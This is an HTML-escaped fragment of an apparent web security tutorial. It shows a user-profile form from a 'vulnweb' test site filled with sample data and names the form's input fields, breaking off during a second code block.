&lt;pre style=&quot;background-color: whitesmoke; border-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: 13px; line-height: 1.42857; margin-bottom: 10px; outline: 0px !important; overflow: auto; padding: 9.5px; word-break: break-all; word-wrap: break-word;&quot;&gt;&lt;code class=&quot; hljs xml&quot; style=&quot;background: rgb(248, 248, 248); border-radius: 0px; box-sizing: border-box; display: block; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: inherit; outline: 0px !important; overflow-x: auto; padding: 0.5em; white-space: pre-wrap;&quot;&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;form&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;name&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;form1&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;method&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;post&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;action&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;table&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;border&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;0&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;cellspacing&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;1&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;cellpadding&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;4&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;tr&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;td&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;valign&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;top&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;Name:&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;td&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;td&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;input&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;type&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;text&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;value&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;James Markus&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;name&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;urname&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;style&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;width:200px&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;td&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;tr&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;tr&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;td&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;valign&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;top&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;Credit card number:&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;td&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;td&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;input&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;type&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;text&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;value&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;1254-5498-5233-5569&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;name&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;ucc&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;style&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;width:200px&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;td&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;tr&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;tr&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;td&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;valign&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;top&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;E-Mail:&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;td&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;td&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;input&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;type&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;text&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;value&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;example@vulnweb.com&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;name&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;uemail&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;style&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;width:200px&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;td&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;tr&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;tr&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;td&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;valign&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;top&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;Phone number:&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;td&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;td&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;input&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;type&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;text&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;value&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;+44 123 12345 123&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;name&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;uphone&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;style&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;width:200px&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;td&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;tr&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;tr&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;td&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;valign&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;top&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;Address:&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;td&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;td&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;textarea&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;wrap&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;soft&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;name&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;uaddress&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;rows&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;5&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;style&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;width:200px&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;North London, London, England&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;textarea&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;td&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;tr&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;tr&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;td&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;colspan&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;2&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;align&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;right&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;input&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;type&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;submit&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;value&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;update&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;name&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;update&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;td&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;tr&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;table&lt;/span&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;/&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;form&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
From the above code we can identify the input fields which will receive information from a user and send to the website. These are called&amp;nbsp;&lt;code style=&quot;background-color: #f9f2f4; border-radius: 4px; box-sizing: border-box; color: #c7254e; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: 12.6px; outline: 0px !important; padding: 2px 4px;&quot;&gt;urname&lt;/code&gt;,&amp;nbsp;&lt;code style=&quot;background-color: #f9f2f4; border-radius: 4px; box-sizing: border-box; color: #c7254e; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: 12.6px; outline: 0px !important; padding: 2px 4px;&quot;&gt;ucc&lt;/code&gt;,&amp;nbsp;&lt;code style=&quot;background-color: #f9f2f4; border-radius: 4px; box-sizing: border-box; color: #c7254e; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: 12.6px; outline: 0px !important; padding: 2px 4px;&quot;&gt;uemail&lt;/code&gt;,&amp;nbsp;&lt;code style=&quot;background-color: #f9f2f4; border-radius: 4px; box-sizing: border-box; color: #c7254e; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: 12.6px; outline: 0px !important; padding: 2px 4px;&quot;&gt;uphone&lt;/code&gt;&amp;nbsp;and&amp;nbsp;&lt;code style=&quot;background-color: #f9f2f4; border-radius: 4px; box-sizing: border-box; color: #c7254e; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: 12.6px; outline: 0px !important; padding: 2px 4px;&quot;&gt;uaddress&lt;/code&gt;&amp;nbsp;and are shown below.&lt;/div&gt;
&lt;pre style=&quot;background-color: whitesmoke; border-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: 13px; line-height: 1.42857; margin-bottom: 10px; outline: 0px !important; overflow: auto; padding: 9.5px; word-break: break-all; word-wrap: break-word;&quot;&gt;&lt;code class=&quot; hljs xml&quot; style=&quot;background: rgb(248, 248, 248); border-radius: 0px; box-sizing: border-box; display: block; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: inherit; outline: 0px !important; overflow-x: auto; padding: 0.5em; white-space: pre-wrap;&quot;&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&amp;lt;&lt;span class=&quot;hljs-title&quot; style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;input&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;type&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;text&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;value&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;John Doe&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;name&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;strong style=&quot;box-sizing: border-box; outline: 0px !important;&quot;&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; font-weight: normal; outline: 0px !important;&quot;&gt;&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;urname&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span class=&quot;hljs-tag&quot; style=&quot;box-sizing: border-box; color: navy; outline: 0px !important;&quot;&gt;&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;&lt;/span&gt; &lt;span class=&quot;hljs-attribute&quot; style=&quot;box-sizing: border-box; color: teal; outline: 0px !important;&quot;&gt;style&lt;/span&gt;=&lt;span class=&quot;hljs-value&quot; style=&quot;box-sizing: border-box; color: #dd1144; outline: 0px !important;&quot;&gt;&quot;width:200px&quot;&lt;/span&gt;&amp;gt;&lt;/span&gt;
